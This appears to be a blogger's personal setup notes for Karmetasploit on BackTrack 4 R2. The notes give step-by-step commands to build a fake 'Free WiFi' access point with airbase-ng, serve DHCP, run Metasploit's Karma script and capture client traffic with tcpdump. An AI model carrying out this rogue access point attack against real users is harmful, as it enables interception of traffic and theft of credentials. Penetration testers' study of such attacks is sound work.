Karmetasploit on BT4R2

Purpose
The purpose of this post is to provide quick guidance on getting Karmetasploit running on BT4R2 for my specific environment.  These steps may work for you, but this post is intended, primarily, to document this so I can remember it later…

Background
Karmetasploit is a combination of Karma and Metasploit.

Resources Used
1: KARMA + Metasploit Framework 3 == Karmetasploit
2: Metasploit with MYSQL in BackTrack 4 r2
3: Karmetasploit Configuration
4a: Metasploit + Karma=Karmetasploit Part 1
4b: Metasploit + Karma=Karmetasploit Part 2

Prerequisites

  • BT4R2 is installed
  • Networking to the Internet is available (to update BT and MSF)

Update BackTrack and MSF
Update BT4R2

> /usr/bin/apt-get update
> /usr/bin/apt-get upgrade

Update MSF

> /opt/metasploit3/msf3/msfupdate

Configure
Metasploit Karma Configuration File
Download File

> /usr/bin/lynx -nolist -dump http://metasploit.com/users/hdm/tools/karma.rc > karma.rc

Edit File
Change the following lines as noted
load db_sqlite3 -> db_driver mysql
db_create /root/karma.db -> db_connect root:toor@localhost/karma

DHCP Configuration File
Edit File
Change the following config file as described in Resource 1.
/etc/dhcp3/dhcpd.conf

Reboot
Restart the host to reset the wireless network… This step may be necessary if you were using the wireless interface to perform the above activities.

Test Wireless Injection

> /usr/local/sbin/airmon-ng start wlan0

The above command creates interface mon0.
The next command tests packet injection on the interface. (Note: the option is --test with two dashes; it may display as a single dash in your browser.)

> /usr/local/sbin/aireplay-ng --test mon0

To stop the monitor interface

> /usr/local/sbin/airmon-ng stop mon0

Run
Start MySQL

> /etc/init.d/mysql start

Create Fake AP
If you have not done so, place the wireless card in monitor mode using:

> /usr/local/sbin/airmon-ng start wlan0

Then execute the following commands:

> /usr/local/sbin/airbase-ng -P -C 30 -c 1 -e "Free WiFi" -v mon0

(The above command creates interface at0. We will use this as the end-point interface for clients connecting to our fake AP.)
Note: without the -c 1 option, my AP would NOT show up in the available networks list of my victim. I obtained the channel number by looking at the output of the --test command: I compared the APs showing up in that list to those showing up on my victim, and then used the same channel. Others have experienced this, as noted in Kosis's comment on CG's blog post (Resource 4b).

> /sbin/ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
> /usr/sbin/dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
> /opt/metasploit3/msf3/msfconsole -r karma.rc
> /usr/sbin/tcpdump -w dump.pcap -i at0

Look at Progress

msf> db_notes

Consider: Blackhole Routing from the MSF paper

NOTES
Looks like fakedns crashes after some time. It appears to crash after the first client connections. How to monitor?
The fakedns can be restarted as follows:

msf> use auxiliary/server/fakedns
msf> set SRVPORT 53
msf> run
